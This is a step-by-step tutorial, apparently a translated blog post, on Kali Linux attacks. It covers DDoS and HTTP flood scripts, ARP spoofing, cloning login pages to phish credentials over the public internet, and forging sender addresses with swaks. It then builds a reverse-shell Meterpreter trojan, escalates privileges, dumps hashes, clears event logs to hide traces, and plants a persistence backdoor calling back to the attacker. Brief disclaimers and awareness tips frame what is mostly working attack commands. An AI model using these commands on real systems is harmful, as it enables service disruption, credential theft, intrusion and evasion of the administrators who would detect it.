Common attack methods in Kali

Common attack methods in Kali

注意:This is only for tutorials and popular science. Do not do anything illegal, otherwise you will be responsible for the consequences.

1 Network attack methods

Please use DDos and CC attacks correctly, and do not use them to do things that violate local laws and regulations, otherwise you will bear the consequences

• Before using kali, you need to be able to access the Internet.
  Reference: kali installation

1.1 DDos attack

1. Open the command line and download the corresponding ddos ​​data package

git clone https://github.com/Andysun06/ddos

2. Enter the folder corresponding to the data package (case sensitive)

cd ddos

3. Execute the script
   The kali used for demonstration in this article is the 2020 version. Use python to execute ddos-p2.py and enter the command:

python ddos-p2.py

Then the following interface will appear:

Then enter the IP of the attack object (this tutorial uses my website as an example)

Open another command line window:

ping + 域名
# 得到ip

4. Configuration parameters

• ip: attack object
• Attack Port is the attack port. Generally, the server defaults to 80 (for more information, please visit Baidu)
• Attack Speed ​​is the attack speed. The larger the value, the faster it is. The maximum cannot exceed 1000.
  

5. launch an attack

Press Enter and the following interface appears, indicating that the attack is successful:

1.2 CC attack

• A type of DDoS attack
• CC (ChallengeCollapsar, challenge black hole) attack is a type of DDoS attack that uses a proxy server to send a large number of seemingly legitimate requests to the victim server.

1. Open the command line as root
2. input the command

ab -n 参数1 -c 参数2 网站地址

Parameter one is the number of concurrency (number of requested users) and
parameter two is the total amount sent (total number of requests)
(those who are interested can learn it separately on Baidu)
Parameter 1, parameter 2 and the website address are set by yourself. Here are 1000, 1000, http://bjvcrrn.nat.ipyingshe.com/bbs/ For example:
The following interface appears to indicate a successful attack:

DDos与CC攻击区别：
1. CC attacks (little traffic, real IP)
are usually application layer attacks. The attack object is a web page. The protocols involved are mainly HTTP and HTTPS. They consume the CPU resources of the server (by requesting a large number of CPU resources, such as query Database)
2. DDOS attacks (large traffic, forged IP)
are usually at the network layer and transport layer. The attack object is IP. The protocols involved are mainly IP, UDP and TCP, which usually consume network bandwidth.

1.3 ARP spoofing

First of all, ARP spoofing requires the use of dsniff packets (arpspoof is a subsidiary tool of dsniff, so we need to install dsniff). The installation command is as follows:

1. Install dsniff

apt-get install dsniff -y

2. Determine the network card name and address

ifconfig

3. Sniff ip device

To sniff the IP addresses of all devices on your WLAN, the command is as follows:

fping -g 本机IP地址/24

For example, my IP is 192.168.145.98, and the command is fping -g 192.168.145.98/24

My other device appears here: 192.168.145.26, which is a PC (centos)
4. Launch the attack

Before launching the attack, first check the network speed of my 192.168.145.26 (target host)

Result: The basic time consumption is about 50ms

Enter the command to launch the attack:

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

Checking the name of the network card has been mentioned above. I take my network card as an example. The name is eth0. The target of the attack is another PC of mine. The IP is 192.168.145.26.

Because I am using a virtual machine, and the gateway configuration of my PC is 192.168.145.2, so my attack command is as follows (generally speaking, the gateway configuration is xxx.xxx.xxx.1, that is, the last digit of the IP is changed to 1) :

arpspoof -i eth0 -t 192.168.145.26 192.168.145.2

Press Enter to launch the attack. The following page appears, indicating that the attack is successful:

5. View the effect
   Now, my other PC is basically unable to access the Internet, which means that our ARP spoofing was successful.
   
   
   If you want to stop the attack, just press Ctrl+Z and the attack will stop.

2 Social engineering attacks (setoolkit)

2.1 Build a phishing website

Phishing websites are commonly used by hackers to steal target usernames and accounts. Today we will mainly introduce how setoolkitto create phishing websites.

setoolkit is a social engineering tool set under kali.

①Enter setoolkit

Command line input:

setoolkit

②Select social engineering attack-cyber attack-phishing website

社会工程学攻击
快速追踪测试
第三方模块
升级软件
升级配置
帮助123456

• In the picture above, we select 1social engineering attack and enter the page below
  

鱼叉式网络攻击
网页攻击
传染媒介式
建立payload和listener
邮件群发攻击
Arduino基础攻击
无线接入点攻击
二维码攻击
Powershell攻击
第三反方模块12345678910

• Enter in the picture above 2, select Network Attack in Social Engineering, and enter the page below:
  

Java applet攻击
Metasploit浏览器攻击
钓鱼网站攻击
标签钓鱼攻击
网站jacking攻击
多种网站攻击
全屏幕攻击1234567

• Select in the picture above 3to enter the phishing website attack and enter the page below:
  

网站模板
站点克隆
用自己的网站123

If you choose a website template, there will be several default login interface templates.

If you want to clone a specified page, choose 2 Site Clone. Of course, although this function is powerful, some websites cannot be cloned. If you cannot clone, choose 3 and make the same website yourself for fishing. Here I will talk about the method of site cloning in detail.

Login page template:

• Enter 2and select the google login template:
  
• Kali monitoring effect:
  

③Site cloning

After selecting 2, we need to enter some information

• Select in the picture above 2, select website clone, and enter the following page:
  

这个是我们克隆完之后的网站返回的ip地址，一般就写虚拟机的IP地址
# 此处我的虚拟机ip为192.168.145.98

This is the IP address returned by the website after we clone it. Generally, we write the IP address of the virtual machine, and then we need to fill in the URL of the website we want to clone.

After pressing Enter, the following information is displayed, which means the cloning is completed.

④kali obtains username and password

We set both the account and password to admin, clicked to log in, and found that it jumped to the real page, and did not return to the interface with wrong account information. At the same time, kali also intercepted the information we entered and displayed it on the terminal.

⑤ Combined with intranet penetration to achieve public network access

This time, I used DVWA to test the login page.
Selection of intranet penetration tools.花生壳

• Go to the official website to download Peanut Shell and install
  the Peanut Shell official website

  • Add new mapping
    
  • Use https mapping authentication

  This service costs 6 yuan

  • Configuration mapping

  Just fill in kali's ip for the intranet host ip.

  

Therefore, here we only need to fill in kali’s IP and port (80) to map it to the external network.

But I also said before that the http protocol is charged, 6 yuan, but it can be used for a long time, and I think it is not expensive.

Okay, now let's go to the last step! Use Custom Import and peanut shells to go fishing~~

⑥Public network fishing

注意：This article is for learning purposes only, illegal things are strictly prohibited!

资料：
一、DVWA：
链接：https://pan.baidu.com/s/1ketwjg_wm5DSvCFNb20K2A 
提取码：sljb

1. Drag the dvwa file to the /root directory. If there are any problems with dragging, please check it yourself.
   
2. Open setoolkit

①. 打开终端输入setoolkit
②. 选择1社会工程学攻击
③. 选择2，网站攻击
④，选择3，钓鱼网站
⑤，选择3，用户导入【默认，回车即可】
⑥，选择导入的路径【/root/dvwa】
⑦，选择2，导入整个文件夹
⑧，配置内网穿透
⑨，通过域名访问，查看kali监听结果

After selecting 3the user to import, the following page will appear, if it is the default, just press Enter
如果默认就直接回车。（如果选择域名，就需要将域名解析到该主机） 我们默认直接回车

Next we choose 2to import the entire folder

3. Configure intranet penetration service

4. Test results

输入网址访问：https://****.****.fun/

⑦The whole process of cloning website commands

If you want to implement public network phishing, ⑥just refer to

1. setoolkit
2. 输入1
3. 输入2
4. 输入3
5. 输入2
6. 输入kali虚拟机ip（或自己搭建的kali的ip）
7. 输入克隆的网站地址
8. 通过kali的ip访问克隆网站地址

• Original website:
  

• Clone website:
  

As you can also see, it is not difficult to create a phishing website, so when we usually visit some common places where we have accounts to log in, we must read the URL clearly to prevent being phished.

2.2 QR code

The QR Code Attack module is used in the SET toolkit to launch a QR code attack, allowing deceived users to scan your QR code and enter a disguised phishing website. Some people will definitely think that this software is useless, but under normal circumstances, if you are given a QR code or an unknown URL, which one would you rather believe? The answer is of course QR code.

The following are the corresponding commands:

1. setoolkit
2. 输入1,社会工程学攻击
3. 输入8，二维码攻击
4. 输入对应网站url（以合天为例：www.hetianlab.com）

QR code generation path (default): /root/.set/reports/
Result:

However, the results scanned using WeChat on the mobile phone are as follows:

You need to use the mobile UC browser to scan to jump to the corresponding website.

The above Kali seems too rubbish... I recommend an online QR code generation platform ( 草料QR code generation), which can generate QR codes that can be scanned and jumped on WeChat and has a rich variety, so you can do whatever you want.

The effect of scanning the generated QR code on the WeChat mobile phone is as follows:

[Summary] The above attack demonstration tells us several points:

1. Do not easily open a link to a website of unknown security or scan a QR code, and foolishly enter your account password and other sensitive information. The website you see may not be real (in reality, attackers will bind public IP addresses , the public domain name is used to confuse the real one with the fake one);
2. At the same time, please be careful not to easily connect to a WIFI of unknown security, because once you enter the WIFI set by the attacker, the attacker can use the DNS spoofing attack inside the LAN to allow you to access domain names such as www.baidu.com Jump to his designated phishing website!

2.3 Phishing emails

When an attacker creates a phishing website or Trojan horse program, he or she will find a way to pass it on to the victim, and a common way of spreading it is through a phishing website. Users with poor security awareness may be attacked if they click on the phishing link in the email and download the Trojan horse program in the attachment after receiving the phishing email!

Tool brief description

Swaks is a tool similar to a "Swiss Army Knife". The reason why it is called so is because it has a very wide range of applications in the field of SMTP email protocols. It is also a good tool for a senior information security engineer! It is usually used to forge emails, conduct phishing, social engineering and other operations.

Basic usage of Swaks:

1. swaks --to [email protected] tests the connectivity of the mailbox;

2. Parameter description (here is just a brief list of some, as for more specific content, you can use –help to view and understand):

--from  [email protected]     //发件人邮箱；
--ehlo   qq.com      //伪造邮件ehlo头，即是发件人邮箱的域名。提供身份认证
--body  "http://www.baidu.com"    //引号中的内容即为邮件正文；
--header  "Subject:hello"   //邮件头信息，subject为邮件标题
--data   ./Desktop/email.txt    //将正常源邮件的内容保存成TXT文件，再作为正常邮件发送；

Kali has built-in swaks, check the versionswaks -v

1. Create a temporary mailbox for receiving emails.
   Create an address: https://www.linshi-email.com/

2. launch an attack

Forge an email from 360hr, the recipient is [email protected], the content is: "Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test. php", as shown below:

swaks --to [email protected] --from [email protected] --ehlo baidu.cn --body "this is your Offer, please click on the link below to enter our employee information page. https://baidu.com"

3. Check the temporary mailbox and receive email messages at this time
   

“===”:swaks输出的信息行 
“*“:swaks中产生的错误 
” ->”:发送到目标的预期行(无错误) 
“<- “:服务器的预期回复(无错误) 
“<**”:服务器返回的错误信息

拓展：Add attachments when sending emails--attach

swaks --to [email protected] --from [email protected] --ehlo 360.cn --body "this is your offer.please open the attach" --attach offer.txt

offer.txt needs to be opened in the current directory :

However, QQ mailboxes and NetEase Cloud mailboxes are temporarily undeliverable. This should be due to the security mechanisms set up by Tencent and NetEase! We would like to remind you to check the source email when encountering a suspicious email to determine whether the sender's IP is a trustworthy IP. Otherwise, a rash operation may sometimes lead to you being phished or even attacked!

2.4 Remote Trojans

SET also integrates a Trojan generation tool, which can generate Trojans and call the MSF framework to control remote hosts.

2.4.1 Generate Trojan and upload to target machine

1. set
2. 选择1，社会工程学攻击
3. 选择4，创建攻击载荷和监听器
4. 选择2，攻击模式选择reverse_tcp meterpreter
5. 输入ip地址（监听的主机ip，kali的ip地址）和端口（随机，只要不被占用即可）

The Trojan address is generated by default: root/.set

Upload the Trojan to the target machine:

2.4.2 Execute Trojans and control the host

Double-click to execute the Trojan and view the results

Activate the Meterpreter session and obtain the Shell to control the Win 7 target machine, as shown in the following figure:

# 选择会话中的第一个目标
sessions -i 1

• control host

You can enter the help command to view all attack commands and descriptions supported by Meterpreter

Screenshot effect:

• Execute getsystema privilege escalation attack
  
• Get the password (the Windows password is actually a hash value hidden in a directory)

Execute the hashdump command to try to obtain the hash values ​​of the passwords of all accounts in the system, but it fails. It doesn't matter, you can execute the script provided by Meterpreter:

• Remote monitoring win7

run vnc

Further attacks can also execute background to transfer the current session to the background for execution, so as to achieve the purpose of background process switching. At the same time, you can execute the migrate command to migrate the session process to the specified process pid to hide the process that controls the session. At this time, the original process is invisible (you can use the ps command to see which processes on the victim machine)

2.4.3 Log clearing

In order not to expose traces of the attacker's behavior, system events need to be cleared

1. First open Windows Event Viewer and view the log records before cleaning.

win + r，输入：eventvwr

2. Execute the clearev command in Meterpreter to clear the log of the target machine, as shown in the following figure:

However, the disadvantage of this command is that it is impossible to specify which part of the logs to clear. One-time clearing can easily attract the attention of the system administrator.

注意：If you accidentally exit the console with ctrl+Z, you can restore it with the following command

# jobs 查看当前被挂起的进程对应的号码
jobs

# 将任务调至前台继续运行
fg %jobnumber（是命令编号，不是进程号）

If you accidentally exit the msf session, reopen setoolkit and set the same ip and port to restore

2.4.4 Creating backdoors

After successfully gaining access to the target system, you need to find a way to restore the connection to the target host without entering the target system again. If the target user destroys the connection, such as by rebooting the computer, use of the backdoor will allow the connection to be automatically re-established with the target system. For the convenience of subsequent penetration, a backdoor needs to be created so that even if the connection is interrupted, the work will not be affected.

1. Before creating a persistent backdoor, check its help file, as shown below:

run persistence -h

2. Execute the command to create a persistent backdoor. The output information will show the process of creating the backdoor. Kali will create a persistent script in the target system
(saved in C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs) and tamper with the registry, as shown below:

run persistence -X -i 5 -p 9000 -r 192.168.145.98(kali渗透机的ip)

3. View the registry and system files of the Win 7 target machine

4. In order to verify whether the backdoor is exploitable, close the current attack session and restart the Win 7 virtual machine

At this time, reopen a terminal in the Kali virtual machine, run the MSF framework, and monitor whether the Win 7 virtual machine can automatically go online after restarting to obtain an attack session: At this point, the

backdoor is successfully implanted! In the future, as long as the Win 7 system is turned on, the backdoor script will automatically run, and attackers can invade at any time! Unless the administrator of the victim host discovers and deletes the corresponding key value in the registry and the backdoor script implanted in the system. At this time, even if the remote control Trojan file payload.exe in the Win 7 target machine is deleted by the administrator, it does not matter, but its functions are limited.

2.4.5 Common commands

运行虚拟桌面：run vnc

获取hash值：run hashdump

查看文件夹：ls

将会话置于后台：background
 
查看运行时间：idletime
 
查看当前用户身份：getuid
 
查看当前用户具备的权限：getprivs
 
查看当前进程PID：getpid
 
查看目标机系统信息：sysinfo
 
查看正在运行的进程：ps
 
搜寻、拷贝、上传文件（需要拥有system权限，可以利用getsystem、MS16-032漏洞进行提权）
    （1）搜寻c盘内所有以txt为后缀的文件：search -f *.txt -d c:\
    （2）拷贝文件至kali内：download c:\1.txt /root
    （3）上传文件至win7：upload /home/zidian/msfadmin.txt c:\
 
重启/关机：reboot / shutdown -h now
 
进入cmd：shell

Get common commands after cmd:

查看当前用户：whoami
 
添加用户和对应密码：net user [username] [password] /add
 
查看当前计算机中的详细情况：systeminfo
 
关闭防火墙：netsh adcfirewall set allprofiles state off
 
查看当前计算机中网络连接通信情况：netstat -ano

msf common commands

Reference: https://cloud.tencent.com/developer/article/1808932
https://www.freebuf.com/articles/network/317596.html

Reference article:
https://blog.csdn.net/a_n_d_y_s_u_n__/article/details/118528019